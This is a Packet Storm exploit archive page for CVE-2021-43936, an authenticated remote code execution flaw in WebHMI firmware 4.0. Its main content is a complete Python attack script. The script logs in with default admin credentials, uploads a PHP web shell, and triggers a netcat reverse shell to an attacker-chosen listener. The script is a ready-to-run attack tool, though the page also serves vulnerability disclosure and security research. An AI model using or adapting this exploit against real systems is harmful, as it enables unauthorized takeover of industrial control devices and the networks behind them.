what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebHMI 4.0 Remote Code Execution

WebHMI 4.0 Remote Code Execution
Posted Dec 13, 2021
Authored by Jeremiasz Pluta

WebHMI version 4.0 suffers from an authenticated remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2021-43936
SHA-256 | 8fecf35d71f3dc324d5f2026b521284cc1cccc2af0409c865a94d3d565f19bef

WebHMI 4.0 Remote Code Execution

Change Mirror Download
# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://webhmi.com.ua/en/
# Version: WebHMI Firmware < 4.1
# CVE: CVE-2021-43936
# Tested on: WebHMI Firmware 4.0.7475

#!/usr/bin/python
import sys
import re
import argparse
import pyfiglet
import requests
import time
import subprocess

banner = pyfiglet.figlet_format("CVE-2021-43936")
print(banner)
print('Exploit for CVE-2021-43936')
print('For: WebHMI Firmware < 4.1')

login = "admin" #CHANGE ME IF NEEDED
password = "admin" #CHANGE ME IF NEEDED

class Exploit:

def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport

def exploitation(self):
payload = """<?php system($_GET['cmd']); ?>"""
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""

headers_login = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'X-WH-LOGIN': login,
'X-WH-PASSWORD': password,
'X-Requested-With': 'XMLHttpRequest',
'Connection': 'close',
'Content-Length': '0'
}

url = 'http://' + target_ip + ':' + target_port
r = requests.Session()

print('[*] Resolving URL...')
r1 = r.get(url)
time.sleep(3)

print('[*] Trying to log in...')
r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
time.sleep(3)

print('[*] Login redirection...')
login_cookies = {
'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
'X-WH-CHECK-TRIAL':'true',
'il18next':'en',
}
r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
time.sleep(3)

print('[*] Uploading cmd.php file...')
files = {
'file': ('cmd.php', payload, 'application/x-php')
}
r4 = r.post(url + '/files.php', files=files, cookies=login_cookies)
time.sleep(3)

print('[*] Setting up netcat listener...')
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)

print('[*] Executing reverse shell...')
print('[*] Watchout for shell! :)')
r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies)

if (r5.status_code == 200):
print('[*] Got shell!')
while True:
listener.wait()
else:
print('[-] Something went wrong!')
listener.terminate()

def get_args():
parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
args = parser.parse_args()
return args

args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport

exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()


Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close